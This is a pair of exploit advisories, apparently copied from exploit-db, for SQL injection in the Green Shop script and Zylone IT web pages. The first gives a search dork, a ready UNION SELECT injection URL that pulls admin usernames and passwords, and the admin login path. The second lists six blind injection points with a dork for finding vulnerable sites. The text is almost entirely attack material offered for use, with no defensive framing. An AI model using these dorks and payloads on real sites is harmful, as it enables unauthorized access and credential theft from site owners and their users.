SQL Injection Vulnerability

SQL Injection Vulnerabilities Green Shop

[x] Tybe: SQL Injection Vulnerabilities

[x] Vendor: egreen.ir

[x] Script Name: Green Shop

[x] author: Ashiyane Digital Security Team

[x] Thanks To N4H

[?] Submit By PrinceofHacking ^_^

[x] Mail : Prince[dot]H4ck@gmail[dot]com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

D0rk: "egreen.ir"

 

Exploit:

http://site.org/index.php?pid=[SQLi]

 

Ex:

http://site.org/index.php?pid=77/**/Union/**/SELECT/**/Group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/admins/**/--

 

Login Page :

http://site.org/admin/login.php

 

Special Tnx : All Ashiyane Members

Zylone IT Multiple Blind SQL Injection Vulnerability

# Exploit Title: Zylone IT Multiple Blind SQL Injection Vulnerability

# Date: 2010-07-08

# Author: Callo

# Software Link: http://www.zylone.com/

# Version: Unknown

# Tested on: php

10101010101010101010101010101010101010101010101010101010101010101010101010101010

0                                                                              1

1 ~# Title: Zylone IT Multiple Blind SQL Injection Vulnerability               0

0                                                                              1

10101010101010101010101010101010101010101010101010101010101010101010101010101010

0                                                                              1

1 ~# Date: 2010-07-07                                                          0

0                                                                              1

10101010101010101010101010101010101010101010101010101010101010101010101010101010

0                                                                              1

1 ~# Author: Callo                                                             0

0 ~# Home: www.gsk2.org                                                        1

1                                                                              0

01010101010101010101010101010101010101010101010101010101010101010101010101010101

1                                                                              0

0 ~# Software Link: http://www.zylone.com/                                     1

1 ~# Version: Unknow

0 ~# Tested on: php                                                            1

1 ~# Dork: Powered by Zylone IT                                                0

0          Powered By: Zylone IT                                               1

1                                                                              0

01010101010101010101010101010101010101010101010101010101010101010101010101010101

1                                                                              0

0 ~# Exploit: http://localhost/[PATH]/news_details.php?news_id=[BLIND SQLi]    1

1             http://localhost/[PATH]/news.php?cat_id=[BLIND SQLi]             0

0             http://localhost/[PATH]/news_details.php?sec_id=[BLIND SQLi]     1

1             http://localhost/[PATH]/home.php?page_id=[BLIND SQLi]            0

0             http://localhost/[PATH]/events.php?cat_id=[BLIND SQLi]           1

1             http://localhost/[PATH]/policy.php?sec_id=[BLIND SQLi]           0

0                                                                              1

01010101010101010101010101010101010101010101010101010101010101010101010101010101

1                                                                              0

0 ~# Greetz: Whivack                                                           1

1                                                                              0

01010101010101010101010101010101010101010101010101010101010101010101010101010101

출처 : exploit-db.com